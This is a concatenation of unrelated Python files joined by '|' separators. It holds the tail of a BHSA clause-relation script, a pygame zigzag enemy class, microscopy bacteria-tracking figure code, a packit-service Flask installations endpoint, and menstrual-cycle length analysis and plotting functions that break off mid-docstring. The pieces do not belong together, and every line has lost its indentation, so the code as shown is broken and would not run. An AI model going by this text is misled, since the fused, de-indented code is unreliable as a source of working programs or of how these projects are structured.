rel_dat['type'] = F.typ.v(cl_atom)
rel_dat['verbplain'] = F.g_cons_utf8.v(verb)
rel_dat['verbtype'] = get_cl_verbform(cl_atom, bhsa, bhsa2gbi)
rel_dat['domain2'] = permissive_q(cl, bhsa) # domain with permissive Q
rel_dat['rela'] = clause_relator(cl, bhsa)
rel_dat['clause_atom'] = T.text(cl_atom)
rel_dat['clause'] = T.text(cl)
# capture text in between starting node and this one
if cl_atom - starting_clatom <= 3:
if cl_atom < starting_clatom:
interm_clatoms = list(range(cl_atom, starting_clatom))
else:
interm_clatoms = list(range(starting_clatom+1, cl_atom+1))
for cl in interm_clatoms:
rel_dat['intertext'] += T.text(cl)
return rel_dat
def clrela_row(node):
"""Retrieve data on related clauses."""
clause_atom = L.u(node, 'clause_atom')[0]
# build data on the mother/daughter clause
relas = {
'mother': nearby_clatom_data(E.mother.f(clause_atom), clause_atom),
'daught': nearby_clatom_data(E.mother.t(clause_atom), clause_atom)
}
row_data = {'bhsa_node': node}
for relcl, rcdata in relas.items():
row_data.update({
f'{relcl}_{k}': rcdata[k] for k in rcdata
})
return row_data
rowmakers = [main_row, clrela_row]
build_sample_tables(
rowmakers,
snakemake.input.sample,
snakemake.output
)
|
import pygame
import random
import math
import enemies.enemy
class ZigZagEnemy(enemies.enemy.Enemy):
def __init__(self, game):
super().__init__(game)
self.timer = self.game.getRepeateTimer()
self.timer.duration = 3000
self.timer.action = self.changeAngle
def changeAngle(self):
if random.randint(0, 1) == 0:
self.angle += math.pi / 2
else:
self.angle -= math.pi / 2
def update(self, elapsed, gameScene):
self.y += math.sin(self.angle) * self.vspeed * elapsed
self.x += math.cos(self.angle) * self.hspeed * elapsed
self.rect.x = self.x
self.rect.y = self.y
if not self.active and not self.inGame():
pass
if not self.active and self.inGame():
self.active = True
if self.active and self.inGame():
pass
if self.active and not self.inGame():
self.kill()
self.timer.cancel()
|
# -*- coding: utf-8 -*-
"""
Created on Mon Jan 09 09:59:13 2017
@author: as624
"""
import csv
import os
import matplotlib.pyplot as plt
import numpy as np
def output_detection_figures(
image, wells, bacteria, timeindex, output_dir):
"""
Produces and saves figures showing the output from the detection
Parameters
------
image : ndarray (2D)
The initial image that detection was run on
wells : ndarray (2D) of dtype int
A labelled image showing the detected wells
bacteria : ndarray (2D) of dtype int
A labelled image showing the detected bacteria
timeindex : int
The timepoint that has been analysed
output_dir : str (path)
Where to save the images
"""
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
plt.contour(wells > 0, levels=[0.5], colors=['y'])
#plt.contour(channel>0, levels=[0.5], colors=['r'])
for lab_bac in range(1, bacteria.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
plt.contour(bacteria == lab_bac, levels=[0.5], colors=[col])
plt.savefig(os.path.join(
output_dir, "detection_frame_{:06d}".format(timeindex)))
plt.close()
def output_tracking_figures(
data,
fullwellimages,
wellcoords,
allbacteria,
output_dir,
bacteria_lineage):
"""
Produces and saves figures showing the output after tracking
Parameters
------
data : list of ndarrays
List of initial image that detection was run on
fullwellimages : list of ndarrays
List of labelled images showing the detected wells
wellcoords : list of arrays
Each entry contains a further list where each entry contains well coordinates
allbacteria : list of arrays
List of labelled images showing the detected bacteria
output_dir : str (path)
Where to save the images
bacteria_lineage : dictionary
A dictionary that links the physical unique label of a bacteria
to one which shows information on its lineage
"""
for tpoint, (image, fullwells, bacteria, coords) in enumerate(
zip(data, fullwellimages, allbacteria, wellcoords)):
# For detection figures, labels not needed (I think)?
plt.figure(figsize=(16, 12))
plt.imshow(image, cmap='gray')
if len(np.unique(fullwells)) == 1:
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
continue
plt.contour(fullwells > 0, levels=[0.5], colors=['y'])
bacteriaim = np.zeros_like(fullwells)
for welllabel in coords:
bacteriaim[coords[welllabel]] = bacteria[welllabel]
# Add in well labels top left(?) of well contour
#bw = fullwells == welllabel
# if not np.any(bw):
# continue
#pos0 = bw.nonzero()
pos = (np.min(coords[welllabel][0]), np.max(coords[welllabel][1]))
plt.text(pos[1], pos[0], "%d" % welllabel, color="y")
for lab_bac in range(1, bacteriaim.max() + 1):
col = plt.cm.gist_rainbow((lab_bac / 9.1) % 1)
bw0 = bacteriaim == lab_bac
if not np.any(bw0):
continue
plt.contour(bw0, levels=[0.5], colors=[col])
pos0 = bw0.nonzero()
if len(pos0[0]) == 0 or len(pos0[1]) == 0:
continue
#lab_string = label_dict_string[lab_bac]
pos = (np.min(pos0[0]), np.max(pos0[1]))
plt.text(pos[1], pos[0], str(bacteria_lineage[lab_bac]), color=col)
plt.savefig(os.path.join(
output_dir, "tracking_frame_{:06d}".format(tpoint)))
plt.close()
def final_output(measurements, output_dir):
"""outputs a final csv with information on the bacteria detected
Parameters
------
measurements : Custom class instance
Its attribute "bacteria" is a dictionary containing information on
each individual bacteria
output_dir : str (path)
Where to write the csv
"""
output_csv_file = os.path.join(output_dir, 'Results.csv')
with open(output_csv_file, "w", newline='') as file0:
writer = csv.writer(file0)
for numbac, (bac) in enumerate(measurements.bacteria.values()):
if numbac == 0:
writer.writerow(bac.headings_line)
writer.writerow(bac.measurements_output)
|
# MIT License
#
# Copyright (c) 2019 Red Hat, Inc.
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
from http import HTTPStatus
from logging import getLogger
try:
from flask_restx import Namespace, Resource
except ModuleNotFoundError:
from flask_restplus import Namespace, Resource
from packit_service.service.events import Event
from packit_service.service.models import Installation
logger = getLogger("packit_service")
ns = Namespace("installations", description="Github App installations")
@ns.route("")
class InstallationsList(Resource):
@ns.response(HTTPStatus.OK, "OK, installations list follows")
def get(self):
"""List all Github App installations"""
return [
Event.ts2str(i["event_data"]) for i in Installation.db().get_all().values()
]
@ns.route("/<int:id>")
@ns.param("id", "Installation identifier")
class InstallationItem(Resource):
@ns.response(HTTPStatus.OK, "OK, installation details follow")
@ns.response(HTTPStatus.NO_CONTENT, "identifier not in whitelist")
def get(self, id):
"""A specific installation details"""
installation = Installation.db().get(id)
no_content = ("", HTTPStatus.NO_CONTENT)
return installation["event_data"] if installation else no_content
|
#!/usr/bin/python
# Imports
import sys, os, re, time
import argparse
import pdb
import pickle
from itertools import *
# Science
import numpy as np
import scipy.stats as stats
import pandas as pd
# Plotting
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
from matplotlib import colors
from mpl_toolkits.mplot3d import Axes3D
################################## FUNCTIONS ############################
# Population time-series
def population_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, sample_style, save_dir):
'''
Function that plots a population level time series embedding of cycle and period lengths
In plot:
x axis is length_attribute for cycle 1,
y axis is length attribute for cycle 2,
z is for cycle 3
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
sample_style: whether to pick the 'first' 3 cycles or a 'random' run of 3 consecutive cycles per user
save_dir: path where to save plot
Output:
None
'''
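# Illustration of the embedding (numbers invented): a user whose first three
# cycle lengths are 28, 30 and 27 days contributes the single 3-D point
# (28, 30, 27) to the scatter for her group.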
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Filename
if sample_style == 'first':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_first_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
if sample_style == 'random':
filename = '{}/population_time_series_embedding_for_{}_split_by_{}_{}_sample_3.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
for index, cycle_lengths in enumerate([cycle_lengths_greater_than, cycle_lengths_less_than]):
print('Start selecting cycles for one group')
if sample_style=='first':
sample_cycle_lengths = [cycle_length[:3] for cycle_length in cycle_lengths if len(cycle_length) >= 3]
if sample_style=='random':
sample_cycle_lengths = []
for cycle_length in cycle_lengths:
if len(cycle_length) >= 3:
num_cycles_array = np.linspace(0, len(cycle_length)-3, len(cycle_length)-2)
start_index = np.random.choice(num_cycles_array, size=1).astype(int)[0]
sample_cycle_lengths.append(cycle_length[start_index:start_index+3])
print('Finished selecting cycles for one group')
print('Start plotting one group')
for i in range(len(sample_cycle_lengths)):
xs = sample_cycle_lengths[i][0]
ys = sample_cycle_lengths[i][1]
zs = sample_cycle_lengths[i][2]
# Plot this point
ax.scatter(xs, ys, zs, color = colors[index], s=1, alpha=0.3)
print('Finished plotting one group')
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
# Add (a)/(b) labels for paper
ax.text2D(12, 7,'(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Time series embedding for a randomly chosen user
def random_time_series_embedding_lengths(cycle_stats_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots a time series embedding of cycle and period lengths for a randomly chosen user per group
In plot:
x axis is length_attribute for cycle i,
y axis is length attribute for cycle i+1,
z is for cycle i+2
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
attribute: whether to consider 'cycle_lengths' or 'period_lengths'
cutoff_criteria: what statistic to use for separating users into groups ('cycle_lengths' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Select users with median number of cycles tracked
cycle_stats_df_median = cycle_stats_df[cycle_stats_df['num_cycles_tracked'] == 11]
filename = '{}/random_time_series_embedding_for_{}_split_by_{}_{}.pdf'.format(save_dir, attribute, cutoff_criteria, cutoff)
#get users with color by attribute > cutoff, and <= cutoff
cycle_stats_df_greater_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] > cutoff]
cycle_stats_df_less_than = cycle_stats_df_median[cycle_stats_df_median[cutoff_criteria] <= cutoff]
cycle_lengths_greater_than = cycle_stats_df_greater_than[attribute]
cycle_lengths_less_than = cycle_stats_df_less_than[attribute]
# Randomly pick a user from each group
cycle_lengths_greater_than_user = np.random.choice(cycle_lengths_greater_than, size=1, replace=False)
cycle_lengths_less_than_user = np.random.choice(cycle_lengths_less_than, size=1, replace=False)
# Plot
colors = ['orange', 'c']
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
#plot each user, color by median intercycle length
xs = list(cycle_lengths_greater_than_user[0][0:-2])
ys = list(cycle_lengths_greater_than_user[0][1:-1])
zs = list(cycle_lengths_greater_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'orange')
ax.plot(xs, ys, zs, color='orange', linestyle='dashed', alpha=0.8)
xs = list(cycle_lengths_less_than_user[0][0:-2])
ys = list(cycle_lengths_less_than_user[0][1:-1])
zs = list(cycle_lengths_less_than_user[0][2:])
ax.scatter(xs, ys, zs, color = 'c')
ax.plot(xs, ys, zs, color='c', linestyle='dashed', alpha=0.8)
ax.set_xlabel(attribute+ '[i]')
ax.set_ylabel(attribute+ '[i+1]')
ax.set_zlabel(attribute+ '[i+2]')
if attribute == 'cycle_lengths':
#ref_line_points = np.linspace(10, 90, 10)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(10,90)
ax.set_ylim3d(10,90)
ax.set_zlim3d(10,90)
elif attribute == 'period_lengths':
max_period_days=28
#ref_line_points = np.linspace(1, max_period_days, 4)
#ax.plot(ref_line_points, ref_line_points, ref_line_points, color='red', linestyle='dashed', linewidth=4, markersize=4)#, alpha=0.8)
ax.set_xlim3d(1,max_period_days)
ax.set_ylim3d(1,max_period_days)
ax.set_zlim3d(1,max_period_days)
ax.set_xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_yticks(np.append([1],np.arange(4,max_period_days+1, 4)))
ax.set_zticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.savefig(filename.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
# With angles
for angle in [30, 60, 90, 180]:
print('Start one view')
filename_angle = filename[:-4]+'_'+str(angle)+'.pdf'
ax.view_init(elev=None, azim=angle)
plt.savefig(filename_angle.format(save_dir), format='pdf', bbox_inches='tight')
print('Finished one view')
plt.close()
# Plot period and cycle length distributions per group
def plot_lengths_hist_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, pdf_or_cdf, save_dir):
'''
Function that plots cycle and period length distributions across groups
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_length' or 'period_length'
cutoff_criteria: what statistic to use for separating users into groups ('median_inter_cycle_length' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
pdf_or_cdf: whether to plot 'pdf's or 'cdf's
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
colors = ['orange', 'c']
labels=['Highly variable', 'NOT highly variable']
if attribute == 'cycle_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Cycle length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Cycle length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
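# Plot the precomputed histogram: passing the bin counts as weights to plt.hist reproduces the np.histogram densities; cumulative=True turns the same counts into a CDF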
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.arange(my_bins.min(), my_bins.max()+1, 10))
plt.xlabel('Cycle length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
# Compute histogram
# Bins based on integer range of values
my_bins=np.arange(
np.min([cycles_users_greater_than_cutoff[attribute].dropna().min(), cycles_users_less_than_cutoff[attribute].dropna().min()]),
np.max([cycles_users_greater_than_cutoff[attribute].dropna().max(), cycles_users_less_than_cutoff[attribute].dropna().max()])+1)
all_counts, all_bins = np.histogram(cycle_df[attribute].dropna(), bins=my_bins, density=True)
counts_greater_than_cutoff, bins_greater_than_cutoff = np.histogram(cycles_users_greater_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
counts_less_than_cutoff, bins_less_than_cutoff = np.histogram(cycles_users_less_than_cutoff[attribute].dropna(), bins=my_bins, density=True)
# Separate PDF/CDF plots
max_period_days=28
if pdf_or_cdf=='pdf':
# PDF
hist_type='stepfilled'
cumulative=False
y_label='P(Period length = n)'
cohort_filename = '{}/{}_pdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_pdf_per_group.pdf'.format(save_dir, attribute)
elif pdf_or_cdf=='cdf':
# CDF
hist_type='step'
cumulative=True
y_label='P(Period length $\leq$ n)'
cohort_filename = '{}/{}_cdf_cohort.pdf'.format(save_dir, attribute)
per_group_filename = '{}/{}_cdf_per_group.pdf'.format(save_dir, attribute)
else:
raise ValueError('Can only plot pdf or cdf, not {}'.format(pdf_or_cdf))
# Population
plt.hist(all_bins[:-1], all_bins, weights=all_counts, density=True, cumulative=cumulative, color='slateblue', alpha=0.5, histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
plt.savefig(cohort_filename, format='pdf', bbox_inches='tight')
plt.close()
# Per-group
plt.hist(bins_greater_than_cutoff[:-1], bins_greater_than_cutoff, weights=counts_greater_than_cutoff, density=True, cumulative=cumulative, color=colors[0], alpha=0.5, label=labels[0], histtype=hist_type)
plt.hist(bins_less_than_cutoff[:-1], bins_less_than_cutoff, weights=counts_less_than_cutoff, density=True, cumulative=cumulative, color=colors[1], alpha=0.5, label=labels[1], histtype=hist_type)
plt.autoscale(enable=True, tight=True)
plt.xticks(np.append([1],np.arange(4,max_period_days+1, 4)))
plt.xlim(1,max_period_days)
plt.xlabel('Period length in days')
plt.ylabel(y_label)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
plt.savefig(per_group_filename, format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Bootstrapped-KS for cycle and period length
def bootstrapped_cycle_period_lengths_KS(cycle_stats_df, cycle_df, cutoff_criteria, cutoff, n_bootstrapping, results_dir):
'''
Function that computes cycle and period length Kolmogorov-Smirnov tests between group distributions, based on bootstrapping
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about user's cycle
cutoff_criteria: what statistic to use for separating users into groups ('median_inter_cycle_length' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
n_bootstrapping: Number of bootstrapped samples to use for the analysis
results_dir: path where to save results
Output:
None
'''
# True separation of users into groups
true_users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
true_users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
n_users_greater_than_cutoff=true_users_greater_than_cutoff.size
n_users_less_than_cutoff=true_users_less_than_cutoff.size
########### TRUE OBSERVED STATISTICS ##########
# Cycles per-group
true_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_greater_than_cutoff)]
true_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(true_users_less_than_cutoff)]
# KS cycle_length
true_KS_cycle_length, true_p_val_cycle_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['cycle_length'].dropna(), true_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
true_KS_period_length, true_p_val_period_length = stats.ks_2samp(true_cycles_users_greater_than_cutoff['period_length'].dropna(), true_cycles_users_less_than_cutoff['period_length'].dropna())
########### BOOTSTRAP BASED STATISTICS ##########
# Pre-allocate arrays for the bootstrapped statistics
bootstrapped_KS_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_cycle_length=np.zeros(n_bootstrapping)
bootstrapped_KS_period_length=np.zeros(n_bootstrapping)
bootstrapped_p_val_period_length=np.zeros(n_bootstrapping)
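# Bootstrap: repeatedly resample users within each group, pool their cycles, and recompute the two-sample KS statistics; the spread of these values indicates the stability of the observed statistics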
for n_bootstrap in np.arange(n_bootstrapping):
#print('Sample={}/{}'.format(n_bootstrap,n_bootstrapping))
# Bootstrapped sample of users: resample with replacement, keeping each group at its original size
bootstrapped_users_greater_than_cutoff=np.random.choice(true_users_greater_than_cutoff,n_users_greater_than_cutoff)
bootstrapped_users_less_than_cutoff=np.random.choice(true_users_less_than_cutoff,n_users_less_than_cutoff)
# Cycles per-group
bootstrapped_cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_greater_than_cutoff)]
bootstrapped_cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(bootstrapped_users_less_than_cutoff)]
# KS cycle_length
bootstrapped_KS_cycle_length[n_bootstrap], bootstrapped_p_val_cycle_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['cycle_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['cycle_length'].dropna())
# KS period_length
bootstrapped_KS_period_length[n_bootstrap], bootstrapped_p_val_period_length[n_bootstrap] = stats.ks_2samp(bootstrapped_cycles_users_greater_than_cutoff['period_length'].dropna(), bootstrapped_cycles_users_less_than_cutoff['period_length'].dropna())
# Print bootstrap results
print('*************************************************************************')
print('******** Cycle-length KS={} (p={}) ***********'.format(true_KS_cycle_length, true_p_val_cycle_length))
print('******** Cycle-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), bootstrapped_KS_cycle_length.std(), bootstrapped_p_val_cycle_length.mean(), bootstrapped_p_val_cycle_length.std()
))
print('******** Cycle-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_cycle_length.mean(), np.percentile(bootstrapped_KS_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_KS_cycle_length, 97.5, axis=0),
bootstrapped_p_val_cycle_length.mean(), np.percentile(bootstrapped_p_val_cycle_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_cycle_length, 97.5, axis=0)
))
print('*************************************************************************')
print('******** Period-length KS={} (p={}) ***********'.format(true_KS_period_length, true_p_val_period_length))
print('******** Period-length Bootstrapped KS={}+/-{} (p={} (+/-{}))***********'.format(
bootstrapped_KS_period_length.mean(), bootstrapped_KS_period_length.std(), bootstrapped_p_val_period_length.mean(), bootstrapped_p_val_period_length.std()
))
print('******** Period-length Bootstrapped KS={}({},{}) p={} ({},{}))***********'.format(
bootstrapped_KS_period_length.mean(), np.percentile(bootstrapped_KS_period_length, 2.5, axis=0), np.percentile(bootstrapped_KS_period_length, 97.5, axis=0),
bootstrapped_p_val_period_length.mean(), np.percentile(bootstrapped_p_val_period_length, 2.5, axis=0), np.percentile(bootstrapped_p_val_period_length, 97.5, axis=0)
))
print('*************************************************************************')
# Average statistics over cycle-id
def plot_avg_lengths_by_attribute_cutoff(cycle_stats_df, cycle_df, attribute, cutoff_criteria, cutoff, save_dir):
'''
Function that plots the mean and standard deviation of cycle and period length across each user's timeline (i.e., by cycle-id), per group
Input:
cycle_stats_df: pandas dataframe, with information about user's cycle statistics
cycle_df: pandas dataframe, with information about each user's cycle
attribute: whether to consider 'cycle_length' or 'period_length'
cutoff_criteria: what statistic to use for separating users into groups ('median_inter_cycle_length' for paper)
cutoff: what statistic cutoff value to use for separating users into groups (9 for paper)
save_dir: path where to save plot
Output:
None
'''
# Identify groups per cutoff criteria
users_greater_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] > cutoff]['user_id'])
users_less_than_cutoff = np.unique(cycle_stats_df[cycle_stats_df[cutoff_criteria] <= cutoff]['user_id'])
cycles_users_greater_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_greater_than_cutoff)]
cycles_users_less_than_cutoff = cycle_df[cycle_df['user_id'].isin(users_less_than_cutoff)]
# Plotting
colors = ['slateblue', 'c', 'orange']
max_cycle_id=20
if attribute == 'cycle_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
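# Three stacked panels: full cohort, group with criteria <= cutoff, group with criteria > cutoff (order matches the dataset list below)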
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:max_cycle_id], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Cycle length')
axes[index].set_ylim(20,55)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(a)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
elif attribute == 'period_length':
fig, axes = plt.subplots(3, 1, sharex='all', sharey='all', figsize = (15,15))
for index, dataset in enumerate([cycle_df, cycles_users_less_than_cutoff, cycles_users_greater_than_cutoff]):
means = dataset.groupby(['cycle_id'])[attribute].mean()[:max_cycle_id]
std = dataset.groupby(['cycle_id'])[attribute].std()[:max_cycle_id]
# Plot
axes[index].plot(np.unique(dataset['cycle_id'])[:max_cycle_id], means, color = colors[index])
axes[index].autoscale(enable=True, tight=True, axis='x')
axes[index].fill_between(np.unique(dataset['cycle_id'])[:max_cycle_id], means - std, means + std, alpha=0.4, color=colors[index])
axes[index].set_xticks(np.append([1],np.arange(2,max_cycle_id+1,2)))
axes[index].set_xlabel('Cycle ID')
axes[index].set_ylabel('Period length')
axes[index].set_ylim(1,9)
# Add (a)/(b) labels for paper
plt.text(12, 7, '(b)', fontsize=14, fontweight='bold', horizontalalignment='center', verticalalignment='center', transform=None)
# Save and close
plt.savefig('{}/avg_{}_per_cycle_id.pdf'.format(save_dir,attribute), format='pdf', bbox_inches='tight')
plt.close()
else:
raise ValueError('Unknown attribute {}'.format(attribute))
# Plot for max intercycle length (i.e., CLD) histogram
def plot_max_intercycle_length_hists(cycle_stats, cycle_stats_exclude_flagged, save_dir):
'''
Function that plots max inter cycle length (max CLD) histograms with and without excluded cycles
Input:
cycle_stats: pandas dataframe, with information about user's cycle statistics
